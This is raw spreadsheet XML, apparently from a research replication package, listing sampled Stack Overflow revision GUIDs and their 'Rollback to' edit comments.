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D:\Projects Home\SOEdits\EMSE Submission\Replication Package\Manually Analyzed Dataset\"/>
    </mc:Choice>
  </mc:AlternateContent>
  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{1ED918DD-BC43-4505-98C7-1DDD2F4C3460}" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
  <bookViews>
    <workbookView xWindow="-108" yWindow="-108" windowWidth="30936" windowHeight="16896" xr2:uid="{00000000-000D-0000-FFFF-FFFF00000000}"/>
  </bookViews>
  <sheets>
    <sheet name="SampledAnswerRollBack"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<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="5746" uniqueCount="4001">
  <si>
    <t>PostId</t>
  </si>
  <si>
    <t>RevisionGUID</t>
  </si>
  <si>
    <t>Comment</t>
  </si>
  <si>
    <t>8268216b-815a-4a6e-b64a-5eb09e1a9709</t>
  </si>
  <si>
    <t>Rollback to [31077e99-b24e-423c-b365-7d38edd0395c]</t>
  </si>
  <si>
    <t>90ff45cd-3ca1-4f7d-9583-9f5a4a899086</t>
  </si>
  <si>
    <t>Rollback to [45dbf3ff-169f-4f84-9e20-6898ec9f596b]</t>
  </si>
  <si>
    <t>d529abce-e54f-49c6-a229-ec319cc2acb1</t>
  </si>
  <si>
    <t>Rollback to [cf94a0cc-f5bb-4d41-b94e-a5bb5e15e672]</t>
  </si>
  <si>
    <t>501b7d75-b470-47de-a9e7-04d2e5331250</t>
  </si>
  <si>
    <t>Rollback to [5956cd57-d2fa-43e9-b010-0bf3c4103a8f]</t>
  </si>
  <si>
    <t>83b51460-03bd-4f8f-b17c-dcdaecaf8258</t>
  </si>
  <si>
    <t>Rollback to [3e8875ee-6fa7-4dd5-8435-14d44b32ab92]</t>
  </si>
  <si>
    <t>1bd24de4-8ac4-480f-a213-e8db6e2b039a</t>
  </si>
  <si>
    <t>Rollback to [D4DD78BF-EF86-4475-9ECF-0D8EDCDFD00F]</t>
  </si>
  <si>
    <t>037744e8-d25b-4b89-a847-95c3c2999d31</t>
  </si>
  <si>
    <t>Rollback to [60399EFD-8BC0-4E4C-889B-7186721E2C25]</t>
  </si>
  <si>
    <t>ed1eb5be-f2f3-436a-b57f-1c1321c5fb04</t>
  </si>
  <si>
    <t>Rollback to [812f1553-7f3d-447d-ba78-fa7210e6c07a]</t>
  </si>
  <si>
    <t>2d575a9f-dd85-4fdf-80e3-8d83d8013892</t>
  </si>
  <si>
    <t>Rollback to [d095aea1-fda7-42cb-ada4-a42b64a278f9]</t>
  </si>
  <si>
    <t>e991712d-1acc-498f-9416-e203cf155d91</t>
  </si>
  <si>
    <t>Rollback to [88372f09-32b7-4460-91b5-a775457272a6]</t>
  </si>
  <si>
    <t>42f48bf8-2ed6-4a48-b1c9-ef4c33d30d6d</t>
  </si>
  <si>
    <t>Rollback to [a78a73b6-2733-4500-9755-691d8ca7bdb4]</t>
  </si>
  <si>
    <t>80268242-a783-4159-9357-9f1dc75ebd8d</t>
  </si>
  <si>
    <t>Rollback to [1fffbce0-2c40-4b37-a053-bd5008952592]</t>
  </si>
  <si>
    <t>f0991746-b6c3-485a-8d6f-c1e9f064e0b7</t>
  </si>
  <si>
    <t>Rollback to [babdab84-4e6f-48aa-a788-c9c23bf5a34d]</t>
  </si>
  <si>
    <t>7747196e-245c-4402-a552-750df3c1752e</t>
  </si>
  <si>
    <t>Rollback to [2805a792-e450-4fb9-b1bc-1d40b128ebd0]</t>
  </si>
  <si>
    <t>e70e6f47-4cb9-410f-bf9b-68ff8ddcb65e</t>
  </si>
  <si>
    <t>Rollback to [9021ca36-2c25-4f07-9821-38514d528828]</t>
  </si>
  <si>
    <t>2024bce6-80c4-44f0-aabc-bb763eb64c05</t>
  </si>
  <si>
    <t>Rollback to [6362ca7d-70cb-4b99-9645-09584497a8ac]</t>
  </si>
  <si>
    <t>91c23824-b7c2-4098-8957-79bbf7320e39</t>
  </si>
  <si>
    <t>Rollback to [3fca43f1-b9bf-4c01-941c-75f10d329125]</t>
  </si>
  <si>
    <t>4e66e3b7-7b7b-498f-aa31-17a6ad493dec</t>
  </si>
  <si>
    <t>Rollback to [10cb5122-4583-4ef7-81fe-81958c2f1afd]</t>
  </si>
  <si>
    <t>eec3e127-4afa-46f9-bf62-677724994a8a</t>
  </si>
  <si>
    <t>Rollback to [9A8E0BF1-DBB7-42D4-826E-0893EE51E538]</t>
  </si>
  <si>
    <t>1d97fbb7-1a7a-4cf1-aa86-953ac79b7fb8</t>
  </si>
  <si>
    <t>Rollback to [242683C7-68ED-4608-9BDD-DF8333B5D8C6]</t>
  </si>
  <si>
    <t>dd2b17de-9438-4573-b0ed-6ef5e9a6f1e1</t>
  </si>
  <si>
    <t>Rollback to [95BDC42C-8E91-4428-B8D7-017E8B16FABB]</t>
  </si>
  <si>
    <t>9dda0da2-fb1b-4c2c-9287-6a283d4214c3</t>
  </si>
  <si>
    <t>Rollback to [76CE8E08-4FC9-43BC-BBA8-15EA608EF075]</t>
  </si>
  <si>
    <t>b3d96cb2-36e9-4be8-89e4-9981a85514d1</t>
  </si>
  <si>
    <t>Rollback to [e4d4bb8d-fdb9-40cb-ac3e-c19db48a6202]</t>
  </si>
  <si>
    <t>4f845fd1-cfb7-47c9-862b-0dc834dca5b9</t>
  </si>
  <si>
    <t>Rollback to [410c08be-26b6-476a-a918-e2f87cbf6256]</t>
  </si>
  <si>
    <t>029e310c-8686-4292-b66c-3064500391c2</t>
  </si>
  <si>
    <t>Rollback to [d6f1f165-3f49-48ff-b087-87b6967ca5e0]</t>
  </si>
  <si>
    <t>05e96562-3978-40af-a84e-aaccffa0a74e</t>
  </si>
  <si>
    <t>Rollback to [fef05221-a1be-4673-ad37-b27a49f225b0]</t>
  </si>
  <si>
    <t>38dc9492-c306-4abf-b039-8664e30e667f</t>
  </si>
  <si>
    <t>Rollback to [a979570f-8cbf-4297-acc5-66f6175a53a2]</t>
  </si>
  <si>
    <t>a9fd06e9-6a25-401f-a404-d9440d069112</t>
  </si>
  <si>
    <t>Rollback to [D3441BDB-02F3-4FE4-93E8-D404ECADA7C0]</t>
  </si>
  <si>
    <t>af88e1a4-a75d-4b68-b2a6-56f85411bbe1</t>
  </si>
  <si>
    <t>Rollback to [2acf9e6d-5103-4ad4-a309-12b1724029f7]</t>
  </si>
  <si>
    <t>1fb69ee0-4801-44ac-92c9-a967bc1d5793</t>
  </si>
  <si>
    <t>Rollback to [091780a3-2450-4b3f-ab30-97b386c645d9]</t>
  </si>
  <si>
    <t>474c7c18-4801-4d75-b9c9-df582ceecd69</t>
  </si>
  <si>
    <t>Rollback to [5EC2AA64-D3E0-4B1A-BB96-13673C28B428]</t>
  </si>
  <si>
    <t>f8a6d11d-d240-402b-819c-8fbab370fba3</t>
  </si>
  <si>
    <t>Rollback to [24656BF2-3578-4626-94AE-00C3EFF4F0D9]</t>
  </si>
  <si>
    <t>d486b5b2-e0d4-4c71-9996-f7e8428bc3d8</t>
  </si>
  <si>
    <t>Rollback to [CA38B0A1-865C-49BF-95AD-280E95A32294]</t>
  </si>
  <si>
    <t>250b87d6-a230-401e-9567-f97db30013d9</t>
  </si>
  <si>
    <t>Rollback to [38E03DC5-21E6-4C0E-91B8-FF0FCDF33861]</t>
  </si>
  <si>
    <t>5680add9-4a7c-4816-8614-2e40fda9ff41</t>
  </si>
  <si>
    <t>Rollback to [bf58b5bc-1521-4c9c-a7d7-001cd81419c1]</t>
  </si>
  <si>
    <t>348c8981-fc54-4ca9-a388-919f98987c9f</t>
  </si>
  <si>
    <t>Rollback to [182265f3-0aa4-4452-9066-cb56ae7cdbda]</t>
  </si>
  <si>
    <t>a93db2ab-aa74-4dd6-b208-d00ce46ee5f7</t>
  </si>
  <si>
    <t>Rollback to [870c8d38-3ca4-4fb7-add0-af082f2de401]</t>
  </si>
  <si>
    <t>52c635c3-647a-45ee-9158-c40d39ccbd00</t>
  </si>
  <si>
    <t>Rollback to [CBF70372-FD59-425D-9884-21849F39C3EC]</t>
  </si>
  <si>
    <t>274f0d5c-eb29-4f7e-b6c5-fe4cf964aca6</t>
  </si>
  <si>
    <t>Rollback to [97E58138-701B-4C1A-BEAE-93212BAA7611]</t>
  </si>
  <si>
    <t>c8d0a43f-013b-44b8-9ce6-baf645b62943</t>
  </si>
  <si>
    <t>Rollback to [2bad9b36-1ec1-4bbc-b258-005c710ae2c2]</t>
  </si>
  <si>
    <t>5b406072-ea2c-433e-8c90-493368c49bad</t>
  </si>
  <si>
    <t>Rollback to [dabef22a-5285-40fe-b054-6469fdaf33a0]</t>
  </si>
  <si>
    <t>2b3b7e18-0e6a-4ec6-8fd5-d5f4435ee226</t>
  </si>
  <si>
    <t>Rollback to [cadee42f-aa78-4c1c-b302-bc7f4ec3eaa7]</t>
  </si>
  <si>
    <t>b7923273-91e1-461d-993b-1465d0315173</t>
  </si>
  <si>
    <t>Rollback to [5725eb0a-c853-4dd7-86f3-9e398f1cbc66]</t>
  </si>
  <si>
    <t>07ce1c23-9ab8-4119-8fd4-b539d69e53af</t>
  </si>
  <si>
    <t>Rollback to [199b1bfe-6e29-4674-ba8a-883f0c86cc98]</t>
  </si>
  <si>
    <t>f11b21f4-3dc5-4a75-9d4a-dee85643cac6</t>
  </si>
  <si>
    <t>Rollback to [c5f97cdb-34f1-466d-8fd2-2eeac9e7230d]</t>
  </si>
  <si>
    <t>b447a8d4-04d0-4607-ab56-c34e76c05860</t>
  </si>
  <si>
    <t>Rollback to [3f77a7ce-5e12-47d5-bb7a-e2d0ea38163b]</t>
  </si>
  <si>
    <t>b76e1e0e-536c-4adc-893f-c4b02b79a477</t>
  </si>
  <si>
    <t>Rollback to [50981981-41b8-4422-b45c-91564ff9b7d7] - Edit approval overridden by post owner or moderator</t>
  </si>
  <si>
    <t>d418804b-a4e5-4805-8962-d4b0d392644c</t>
  </si>
  <si>
    <t>Rollback to [516DE214-030F-4818-8BCC-810CD142A8CC]</t>
  </si>
  <si>
    <t>86516ce4-818b-4993-bd14-cf2908d47d4d</t>
  </si>
  <si>
    <t>Rollback to [199a3f02-f149-431f-a759-58bdac3c55cc] - Edit approval overridden by post owner or moderator</t>
  </si>
  <si>
    <t>1b0535e6-18b3-4d7b-a48e-13953d9fa205</t>
  </si>
  <si>
    <t>Rollback to [778bd5e1-db45-47cc-8506-9b9e22401772]</t>
  </si>
  <si>
    <t>61a67f93-55c1-48b7-973e-f4094c046ec7</t>
  </si>
  <si>
    <t>Rollback to [8edff838-0126-4647-a706-31ec8913ca39]</t>
  </si>
  <si>
    <t>2cd542d2-7539-47b1-897d-f276f0b07409</t>
  </si>
  <si>
    <t>Rollback to [cfa3705f-bcff-41d9-ab28-76eef5fcf579]</t>
  </si>
  <si>
    <t>d4f8d5b1-e336-42f5-863c-248e19a7e703</t>
  </si>
  <si>
    <t>Rollback to [5dc0d419-c8bb-44ce-b289-dea92aa00701]</t>
  </si>
  <si>
    <t>23dbb022-dce9-434b-948d-1718149e05e7</t>
  </si>
  <si>
    <t>Rollback to [dd8c80a3-995a-4613-865f-98c1bb1970e3]</t>
  </si>
  <si>
    <t>e1da7711-1868-416f-86da-ac6117fe339a</t>
  </si>
  <si>
    <t>Rollback to [9B658782-844B-48CC-B666-C2CFF12A050A]</t>
  </si>
  <si>
    <t>27fb2742-765d-4862-ba81-a82efde077ea</t>
  </si>
  <si>
    <t>Rollback to [fb3745e2-8295-4538-9ad7-f58f2f6e7046]</t>
  </si>
  <si>
    <t>49e380e4-01fe-4e2b-a5b4-f6c0daef91b0</t>
  </si>
  <si>
    <t>Rollback to [91E0CCA2-8F07-4052-9831-AE8EB5C7FDD7]</t>
  </si>
  <si>
    <t>24c877b4-1e66-41fb-9285-91f41956044b</t>
  </si>
  <si>
    <t>Rollback to [6e970571-d5e2-4903-94e7-044d9bb1ffb2]</t>
  </si>
  <si>
    <t>e66851eb-9eef-455e-b4e6-8273866913ae</t>
  </si>
  <si>
    <t>Rollback to [C10B93D7-F36B-4BCA-BE27-766190683E89]</t>
  </si>
  <si>
    <t>097ef9ac-6095-43f6-bc55-34ac4c892b9d</t>
  </si>
  <si>
    <t>Rollback to [0c9ed53b-1765-4d84-8e19-1e20e83fc291]</t>
  </si>
  <si>
    <t>f2bfd7ec-78cf-408c-b7ff-b23309bb6083</t>
  </si>
  <si>
    <t>Rollback to [0d5dc92e-5881-4d9c-addb-d1c893b61a71]</t>
  </si>
  <si>
    <t>6d575ee3-11dd-49e2-a357-04c6303c5265</t>
  </si>
  <si>
    <t>Rollback to [AF634002-49B7-4882-94F3-DA3955892BA8]</t>
  </si>
  <si>
    <t>57989f8d-881d-442f-831a-a46063c453a9</t>
  </si>
  <si>
    <t>Rollback to [2DC8030A-9454-4F98-87AA-C194C000D4BE]</t>
  </si>
  <si>
    <t>66fd4022-d2e4-415c-bc14-5d11555b9fd3</t>
  </si>
  <si>
    <t>Rollback to [66c45ff2-ed1a-4e27-944c-5ad989117f5b]</t>
  </si>
  <si>
    <t>6b8a17e8-1f88-41f6-af7d-cc5aa95dbdff</t>
  </si>
  <si>
    <t>Rollback to [fee3c662-a7c9-499f-a5cb-196201729e25]</t>
  </si>
  <si>
    <t>99969ff9-763d-4626-97b1-0adafe9f97a8</t>
  </si>
  <si>
    <t>Rollback to [24A0BF4F-9BD5-4A1F-97C3-2F65DD15271F]</t>
  </si>
  <si>
    <t>5463082e-3148-4ef4-b0d3-1bebbac40c22</t>
  </si>
  <si>
    <t>Rollback to [5e36f938-8642-4203-8e0b-304747e54aae]</t>
  </si>
  <si>
    <t>b39728e1-cbaa-4d69-98ca-1167b8f79b11</t>
  </si>
  <si>
    <t>Rollback to [9e701287-b04e-4590-8387-eacd51d9fd37]</t>
  </si>
  <si>
    <t>c3fd6167-1fd6-4f90-bcff-0c13c793fd4c</t>
  </si>
  <si>
    <t>Rollback to [c2e364d8-c863-4400-a3e2-0b4d7cee98d7]</t>
  </si>
  <si>
    <t>07f4d025-0f23-45eb-9b6b-daad5a46c886</t>
  </si>
  <si>
    <t>Rollback to [ad7695b9-c55d-4434-9ea7-0dd5ed6f33fe]</t>
  </si>
  <si>
    <t>0431e55d-5a37-432e-a394-4cb810022ee2</t>
  </si>
  <si>
    <t>Rollback to [d106bf94-3114-4074-99c9-bbca9ec29cac]</t>
  </si>
  <si>
    <t>dd928ca8-1b87-4c29-9cd7-87d047f7f8b0</t>
  </si>
  <si>
    <t>Rollback to [09655a30-688f-433f-acb4-4f07e41c581f]</t>
  </si>
  <si>
    <t>052356d9-d71d-460d-95da-f36a02ad8097</t>
  </si>
  <si>
    <t>Rollback to [0dbe6d03-c124-46ab-aff2-016a0969da3e]</t>
  </si>
  <si>
    <t>8b4f7477-690f-440d-acb7-b53a5d84d7f3</t>
  </si>
  <si>
    <t>Rollback to [215a91ab-ae78-4779-8e1d-28ab254394e9]</t>
  </si>
  <si>
    <t>959429d4-0c0e-4f96-9b46-00ad77fad6da</t>
  </si>
  <si>
    <t>Rollback to [85ef687e-e9e3-4d81-9bff-1c4784918096]</t>
  </si>
  <si>
    <t>86c9718d-5213-41c2-a93c-b804008b65c7</t>
  </si>
  <si>
    <t>Rollback to [C6AF22D2-EF46-4A3A-B663-7FC1B5BDFB38]</t>
  </si>
  <si>
    <t>2b232a1e-3544-4d37-be38-07334d61292e</t>
  </si>
  <si>
    <t>Rollback to [2c34795f-d2e0-4881-a323-a0ee35880c89]</t>
  </si>
  <si>
    <t>487afd42-e644-433c-bacd-947f4e89b602</t>
  </si>
  <si>
    <t>Rollback to [5ac912bd-1b25-4e99-bc09-aabc9883b028]</t>
  </si>
  <si>
    <t>36632117-c41f-4ef4-92c1-600a08dc0356</t>
  </si>
  <si>
    <t>Rollback to [65DA61CB-ADB7-4062-8EF1-BC6DEFF21911]</t>
  </si>
  <si>
    <t>4afe644c-6011-419b-8e87-690314b7ea3a</t>
  </si>
  <si>
    <t>Rollback to [4E9D45E8-B440-4690-967B-B35E0AC1AB7A]</t>
  </si>
  <si>
    <t>55dc88c2-8c33-45bb-9ac2-a19372ae15e4</t>
  </si>
  <si>
    <t>Rollback to [c2bd33e1-a70a-48b7-a80a-297b37c7d63c]</t>
  </si>
  <si>
    <t>89185a54-2ca6-4ba8-a864-e0f39187ae52</t>
  </si>
  <si>
    <t>Rollback to [D4259A32-2F27-4859-AB3F-82B4069D10DC]</t>
  </si>
  <si>
    <t>f02df8f5-6179-486b-9835-002cade36385</t>
  </si>
  <si>
    <t>Rollback to [b8673e1b-2f60-4440-8d69-f968e38fcf95]</t>
  </si>
  <si>
    <t>e01e038d-9b59-405e-9d16-cd02e2337d14</t>
  </si>
  <si>
    <t>Rollback to [61f64b9d-eb55-4d46-9402-9e5b49584f69]</t>
  </si>
  <si>
    <t>6208dc86-3660-4365-a5f0-11544ef198b4</t>
  </si>
  <si>
    <t>Rollback to [877c2b3c-4ff7-4b94-a918-21cbb79a2efe]</t>
  </si>
  <si>
    <t>20ed17c1-6c4c-4c48-a41e-663abd885fe8</t>
  </si>
  <si>
    <t>Rollback to [dec05697-c7c8-4e9f-99f1-a403d7498fea]</t>
  </si>
  <si>
    <t>30ba7535-7cf0-4be6-b69f-8edbd5b393fc</t>
  </si>
  <si>
    <t>Rollback to [23b4b06d-d75b-45a0-896d-e74844463394]</t>
  </si>
  <si>
    <t>1eb5aa02-a616-4728-88e2-9bbf6575d323</t>
  </si>
  <si>
    <t>Rollback to [9e5b7b01-c45a-4605-a15f-8c34d283f16c]</t>
  </si>
  <si>
    <t>37d126c4-fd1f-45ad-8897-b1bf78cee407</t>
  </si>
  <si>
    <t>Rollback to [82fc95fd-0cbb-4495-9136-1fd80daee842]</t>
  </si>
  <si>
    <t>92cc156c-0db6-4f27-a298-f1d3443e02fc</t>
  </si>
  <si>
    <t>Rollback to [7aa6780c-effc-4430-bef5-57f9bc05c74b]</t>
  </si>
  <si>
    <t>5007fa3b-c0e8-421e-a438-2483982d954f</t>
  </si>
  <si>
    <t>Rollback to [2606a242-436e-426e-9250-c48622cbaeac]</t>
  </si>
  <si>
    <t>f1f80410-16b1-4592-80ae-e989b5e3cd00</t>
  </si>
  <si>
    <t>Rollback to [4224ac2c-fe05-45cd-a1ab-c69c99dfe9a5] - Since it's an except from an external source, it should be in blockquotes.</t>
  </si>
  <si>
    <t>c8b430cb-8d10-43fc-8a6b-d30c6459a5e8</t>
  </si>
  <si>
    <t>Rollback to [06A29440-8000-4694-A283-37D81FA77BEF]</t>
  </si>
  <si>
    <t>c3fa1f69-7113-404b-a8f7-7d84778205d9</t>
  </si>
  <si>
    <t>Rollback to [627d8ea5-0210-4f55-b8b5-31f7c7882255]</t>
  </si>
  <si>
    <t>9f88086c-e87e-4d0b-8c3d-d390581eaf72</t>
  </si>
  <si>
    <t>Rollback to [D96ED601-545F-4ACA-B4AB-B1D32E24E6C3]</t>
  </si>
  <si>
    <t>7a95de79-94dc-4e4a-8570-5af3fb442702</t>
  </si>
  <si>
    <t>3d60f2f6-b449-4575-9bf6-7a28eb041bef</t>
  </si>
  <si>
    <t>Rollback to [bb0d28e8-fd3a-492e-bceb-75240e370d82]</t>
  </si>
  <si>
    <t>6f259294-10ce-4944-b59f-4a8e42c85ad8</t>
  </si>
  <si>
    <t>Rollback to [6c7a3041-f125-40d6-8a4d-1586966f4905]</t>
  </si>
  <si>
    <t>c205705b-6855-4acf-9c59-309da99beb32</t>
  </si>
  <si>
    <t>Rollback to [5a0d55f0-de5a-4763-906c-192388c7681d]</t>
  </si>
  <si>
    <t>7682c11c-ca42-4c62-adff-5b59e84e966f</t>
  </si>
  <si>
    <t>Rollback to [0c1d7378-b6a0-4a0a-98a7-3d0cdacba1c0]</t>
  </si>
  <si>
    <t>195dce56-444d-4649-abb7-39ba3643893e</t>
  </si>
  <si>
    <t>Rollback to [EC546074-E47D-484E-A1A0-4A327F119E3C]</t>
  </si>
  <si>
    <t>c2ae91b3-fef7-4373-8137-92482e3fb417</t>
  </si>
  <si>
    <t>Rollback to [9b97c595-3bbb-4a01-ba09-150b84f73611]</t>
  </si>
  <si>
    <t>c0c39dc4-a1a6-4f09-b06f-f3715a42cc61</t>
  </si>
  <si>
    <t>Rollback to [e229e501-900e-464d-b43f-980bd7b9d305]</t>
  </si>
  <si>
    <t>b8bcaf54-db4c-48d3-9417-a1d66b07e384</t>
  </si>
  <si>
    <t>Rollback to [f44d695f-6c17-4dcf-a427-0245df6317d9]</t>
  </si>
  <si>
    <t>2a3388c5-59da-437d-8d21-61de461bf7da</t>
  </si>
  <si>
    <t>Rollback to [80acc4ac-d995-4f35-b884-26cc0fa96121]</t>
  </si>
  <si>
    <t>542cfa06-0f5d-4b5a-87b3-b73c82b8db7c</t>
  </si>
  <si>
    <t>Rollback to [d8cc72a5-bc33-442c-914c-24f1396cb1e1]</t>
  </si>
  <si>
    <t>06c76568-4204-4186-9b92-5afb6589175d</t>
  </si>
  <si>
    <t>Rollback to [28fd659e-47d1-4848-a7a9-55d3eade8a11] - Edit approval overridden by post owner or moderator</t>
  </si>
  <si>
    <t>b65adf7a-557e-4b1e-a436-7a3ec8efdefa</t>
  </si>
  <si>
    <t>Rollback to [37933ba3-9650-4d62-862c-4e3986380f19]</t>
  </si>
  <si>
    <t>6657c5cb-3a0c-468d-8570-e0b74af84385</t>
  </si>
  <si>
    <t>Rollback to [5edb0cc9-4a85-4d51-b052-8bea3e46f0db]</t>
  </si>
  <si>
    <t>25f5d1de-e396-41b3-85cf-80134b782d49</t>
  </si>
  <si>
    <t>Rollback to [cd8db31f-b40c-4f84-ad3d-6a35308efbd0]</t>
  </si>
  <si>
    <t>e3df13f0-0d68-434a-a341-5342e520de58</t>
  </si>
  <si>
    <t>Rollback to [f4a93526-5e18-400b-94bd-c96970251d6a]</t>
  </si>
  <si>
    <t>18a77791-7456-4d2a-aeff-7c9ce9229336</t>
  </si>
  <si>
    <t>Rollback to [FA642CD9-F4F5-44C0-8020-BABF89F93F20]</t>
  </si>
  <si>
    <t>169b148e-7eb7-48d4-8b58-63f828daad12</t>
  </si>
  <si>
    <t>Rollback to [817a5d3b-fca2-486c-8465-913472c8d231]</t>
  </si>
  <si>
    <t>a472c8a5-f9bf-42f1-bfc3-2bf066d9a137</t>
  </si>
  <si>
    <t>Rollback to [C9E4D659-B0A7-44D5-8FAB-E718BDEA44C4]</t>
  </si>
  <si>
    <t>95d06ef4-1cc0-409d-bad0-f35ee518a49d</t>
  </si>
  <si>
    <t>Rollback to [e44e653a-cdb2-4e15-b325-5c35ba787773]</t>
  </si>
  <si>
    <t>dff1c4bd-82a3-4dd6-bd96-2c32455eb2e9</t>
  </si>
  <si>
    <t>Rollback to [575b0892-0bd5-4c3f-a939-60a55b600fa2]</t>
  </si>
  <si>
    <t>b6cd6b95-bd2a-4895-acb2-9f3204a57325</t>
  </si>
  <si>
    <t>Rollback to [6b01b478-7d74-4c8d-9f26-c4291785a3da]</t>
  </si>
  <si>
    <t>ea47e30a-87ec-4433-89cd-7ae68889cd4e</t>
  </si>
  <si>
    <t>Rollback to [2361e56d-c3d8-40b5-9296-f263d5c74404]</t>
  </si>
  <si>
    <t>b24c74ae-05d9-4399-b6bb-44af7569db8a</t>
  </si>
  <si>
    <t>Rollback to [9af52e01-6146-41d5-b22b-f5a25a4e1283]</t>
  </si>
  <si>
    <t>51bfbf73-e647-4c3b-867c-8c58238b1301</t>
  </si>
  <si>
    <t>Rollback to [50207f99-5e0f-4a24-b8cc-2bd66c14bfec]</t>
  </si>
  <si>
    <t>c02f5023-9608-44ec-82b3-f6f712d38d3e</t>
  </si>
  <si>
    <t>Rollback to [C4471188-8364-40FA-A4FD-02E092A61553]</t>
  </si>
  <si>
    <t>6317f057-8a3d-43b9-9268-42d4c8568a60</t>
  </si>
  <si>
    <t>Rollback to [84d40640-8102-4d75-a106-6aaf5179e196]</t>
  </si>
  <si>
    <t>350cd563-5b52-4d7b-bb69-5238965c1a8c</t>
  </si>
  <si>
    <t>Rollback to [ABFC9167-12B7-4D3A-9922-FBB6659265F2]</t>
  </si>
  <si>
    <t>69b9c596-ea64-403f-abe6-5baf929401fd</t>
  </si>
  <si>
    <t>Rollback to [ecd4640a-f351-40e5-b435-9c0f03cb2218]</t>
  </si>
  <si>
    <t>c26e4bb7-56a9-48fb-8073-4198a781fb9b</t>
  </si>
  <si>
    <t>Rollback to [64fd003d-4506-48f3-8daf-61711387ea98]</t>
  </si>
  <si>
    <t>e724ad8e-c288-4fd0-933a-54661cdc2f53</t>
  </si>
  <si>
    <t>Rollback to [c9284cb6-5b99-4768-8fde-d5ea2d1bc40a]</t>
  </si>
  <si>
    <t>510e5036-522b-4b80-9ff6-55f5234ce9ce</t>
  </si>
  <si>
    <t>Rollback to [23542c50-7282-4519-ac12-b63410b84541]</t>
  </si>
  <si>
    <t>06828dfa-e496-45ba-a225-b42ddc97de1c</t>
  </si>
  <si>
    <t>Rollback to [2c3f5a8d-9c19-4c86-9704-1bfc51f76e66]</t>
  </si>
  <si>
    <t>3164666d-cd3a-4c52-992c-68cd0e72c805</t>
  </si>
  <si>
    <t>Rollback to [0430DFAE-F40B-428D-BFCD-5581ECA9B5D4]</t>
  </si>
  <si>
    <t>7461efb9-fde9-446d-90fa-4c1f55e73311</t>
  </si>
  <si>
    <t>Rollback to [D4D28674-9576-4334-BFCD-4820A52E3377]</t>
  </si>
  <si>
    <t>511a8735-6896-4f5b-b53d-eaeaac889028</t>
  </si>
  <si>
    <t>Rollback to [95572c0b-552c-4e5e-a052-f0af3ef7772b]</t>
  </si>
  <si>
    <t>fcd31f0f-3705-4d50-a238-a6b796fc53cf</t>
  </si>
  <si>
    <t>Rollback to [b23cae96-82b4-4d42-ba82-e1a751b50015] - Changed private function name back to camel case, per language standards</t>
  </si>
  <si>
    <t>162fa23c-6236-4e24-ac09-941d691de57c</t>
  </si>
  <si>
    <t>Rollback to [a6788538-981c-43b8-9209-8de688c51792]</t>
  </si>
  <si>
    <t>3ad8f924-8bff-4f8f-98c9-0d16df0138b3</t>
  </si>
  <si>
    <t>Rollback to [0104d85f-9b4a-46ee-b002-0d049ba3df98]</t>
  </si>
  <si>
    <t>cc302a49-1788-455f-83ac-4e038a74dca4</t>
  </si>
  <si>
    <t>Rollback to [0DC4AE27-097E-4207-9854-2BB8D4594D27]</t>
  </si>
  <si>
    <t>7962f263-54c8-4cc6-a979-ce8f04097f1c</t>
  </si>
  <si>
    <t>Rollback to [e07dd0e6-001f-4908-a7ac-fb7ccfd8767d]</t>
  </si>
  <si>
    <t>f7677c02-b7aa-47f8-8941-002b56d262f1</t>
  </si>
  <si>
    <t>Rollback to [7bf31210-da55-4f7c-a15d-d594769d1376]</t>
  </si>
  <si>
    <t>9c013723-4a04-45c1-9b8d-c62740eb7a6c</t>
  </si>
  <si>
    <t>Rollback to [EB2ACD47-3625-45FD-A216-6E5FD6120842]</t>
  </si>
  <si>
    <t>891e0f76-0c2b-429c-9711-d905d717fe3f</t>
  </si>
  <si>
    <t>Rollback to [23343b6b-8293-41f0-a48b-209290be1050]</t>
  </si>
  <si>
    <t>1eb13224-a55d-4e12-8c1f-b26131024d99</t>
  </si>
  <si>
    <t>Rollback to [909d1955-2b4d-4d3e-94ae-8758305fe23b]</t>
  </si>
  <si>
    <t>582fdedd-2f0b-429f-951f-2b550104fb43</t>
  </si>
  <si>
    <t>Rollback to [6C0EBC6F-0695-49F2-AD4F-3A4B9D6F12EA]</t>
  </si>
  <si>
    <t>085d8e22-e24c-4ed0-86dd-0c4fc22b72ca</t>
  </si>
  <si>
    <t>Rollback to [799e5ead-2cbc-4a81-a7d6-d6b4bbaac32c]</t>
  </si>
  <si>
    <t>5e2a1433-1501-480d-a181-a763dcac4e2b</t>
  </si>
  <si>
    <t>Rollback to [af170852-f911-4219-a4c0-a6fca81d7e6c]</t>
  </si>
  <si>
    <t>95df8a7a-fb90-4607-821a-9b24d289adbf</t>
  </si>
  <si>
    <t>Rollback to [1d89bb10-187b-410f-821a-b1e855019862]</t>
  </si>
  <si>
    <t>195d6af2-d36e-4a83-a3b3-14beec034976</t>
  </si>
  <si>
    <t>Rollback to [0371adaf-075c-4d89-a434-e9a06f06110a]</t>
  </si>
  <si>
    <t>a4601978-7181-4434-86d7-0c8a1c914a4d</t>
  </si>
  <si>
    <t>Rollback to [4fa90124-6918-4718-aa4c-7d688a9ed199]</t>
  </si>
  <si>
    <t>44c70988-6882-4aa2-a8b4-20d395e64436</t>
  </si>
  <si>
    <t>Rollback to [829f4044-a048-4747-993e-6c90a02a288b]</t>
  </si>
  <si>
    <t>7d93020a-b7bd-4e6a-906d-0c2bdfa92552</t>
  </si>
  <si>
    <t>Rollback to [48a0bfbf-261e-4390-bffe-4cc5b80dd4d7]</t>
  </si>
  <si>
    <t>19784a98-580d-4457-bf28-3d3bd018fbf4</t>
  </si>
  <si>
    <t>Rollback to [b8b6b012-c6a0-4512-b106-d3cdf4349806]</t>
  </si>
  <si>
    <t>a31bdc13-ce33-41ca-882b-8ec0b8d2022c</t>
  </si>
  <si>
    <t>Rollback to [3dda9ddc-44b9-4f7e-ab58-bdc0bba95a6f]</t>
  </si>
  <si>
    <t>4f4173a0-0f28-439a-9423-b8378ee533a6</t>
  </si>
  <si>
    <t>Rollback to [c279e11c-aac0-4c5a-b7ac-8e6afb8b88bb]</t>
  </si>
  <si>
    <t>2369261b-2116-4953-a403-f2c9550be88a</t>
  </si>
  <si>
    <t>Rollback to [3287bc1c-17c0-4a84-a0b1-dac03614dbb0]</t>
  </si>
  <si>
    <t>8eb160e6-a960-4c57-9d9b-faf8c436b010</t>
  </si>
  <si>
    <t>Rollback to [57DC08A9-7108-4923-8FE1-C294865A4C01]</t>
  </si>
  <si>
